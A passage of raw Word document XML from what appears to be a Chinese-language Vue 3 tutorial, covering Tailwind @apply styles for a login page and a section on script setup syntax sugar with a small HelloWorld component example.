      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.login-container .right{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D18B1" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply  bg-light-50 flex items-center justify-center flex-col;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1978F72D" w14:textId="77777777" w:rsidR="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D145719" w14:textId="168E7DE9" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>大意是，</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>eft</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> div</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中的第一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF27A7" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.left&gt;div&gt;div:first-child{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A91153F" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply font-bold text-5xl text-light-50 mb-4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8FB16" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F555BB" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.left&gt;div&gt;div:last-child{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE6BF7F" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply text-gray-200 text-sm;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D5FCD" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22610E45" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.right .title{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D3BE5" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply font-bold text-3xl text-gray-800;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799F76F6" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A3B31A" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.right&gt;div{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241ADBDE" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply flex items-center justify-center my-5 text-gray-300 space-x-2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35718B05" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF2192" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.right .line{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E7C74F" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    @apply h-[1px] w-16 bg-gray-200;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD629C5" w14:textId="77777777" w:rsidR="001770A2" w:rsidRPr="001770A2" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3DE540" w14:textId="3C0D3F03" w:rsidR="003D73B1" w:rsidRDefault="001770A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001770A2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47909401" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C21F587" w14:textId="5458EB87" w:rsidR="00D473D8" w:rsidRDefault="00D473D8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="691" w:name="_Toc159780121"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法糖和组合式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="691"/>
    </w:p>
    <w:p w14:paraId="108AB658" w14:textId="7C19BAF7" w:rsidR="003D73B1" w:rsidRPr="00D473D8" w:rsidRDefault="00885D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3482087D" w14:textId="6DC2C15E" w:rsidR="003D73B1" w:rsidRDefault="00885D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00885D42">
        <w:t>https://cn.vuejs.org/api/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C77ED" w14:textId="68F87C2C" w:rsidR="003D73B1" w:rsidRDefault="004F1C6A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004F1C6A">
        <w:t>https://cn.vuejs.org/api/sfc-script-setup.html#basic-syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1BB1A" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD3C5F7" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535E4F53" w14:textId="54F3CF32" w:rsidR="003D73B1" w:rsidRDefault="00D6665B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以生成更简洁的代码，更少的样板内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4B87D5" w14:textId="77777777" w:rsidR="00D6665B" w:rsidRDefault="00D6665B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6415FEA3" w14:textId="290FB8E8" w:rsidR="003D73B1" w:rsidRDefault="00D6665B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script setup&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候，任何在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script setup&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明的顶层的绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括变量，函数声明，以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入的内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6665B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都能在模板中直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD6AB1A" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586ECFE6" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DCC9F5" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C6596" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2912246E" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首页，欢迎！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380C4A08" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-button @click="addCount"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A80E5FA" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{{  count }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E039630" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C6053F" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE41AAF" w14:textId="776D6656" w:rsidR="00E5457C" w:rsidRPr="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HelloWorld</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC3759B" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;HelloWorld/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83A388" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34258BA6" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B20DF" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD8BC03" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FC4CA" w14:textId="469DB6F4" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以引入其他组件，然后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标签中直接放置该组件的代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B1B759" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import HelloWorld from '../components/HelloWorld.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D3BFB3" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366E254C" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRPr="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>let count = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A99A455" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRPr="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334234E9" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRPr="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    function addCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF494EE" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRPr="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        console.log(addCount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B023078" w14:textId="77777777" w:rsidR="00E5457C" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E5457C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A8106" w14:textId="1E0A6CC6" w:rsidR="003D73B1" w:rsidRDefault="00E5457C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA48E2F" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4758A8" w14:textId="24780234" w:rsidR="0012694F" w:rsidRDefault="0012694F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HelloWorld</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容，该页：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D13ED8" w14:textId="7BC157CD" w:rsidR="0012694F" w:rsidRDefault="0012694F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43524C08" wp14:editId="41FEB665">
            <wp:extent cx="2738673" cy="1603769"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="89687235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72358" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId196"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2749367" cy="1610032"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF7418" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06CA2C09" w14:textId="77775364" w:rsidR="00433B55" w:rsidRPr="00433B55" w:rsidRDefault="00433B55" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
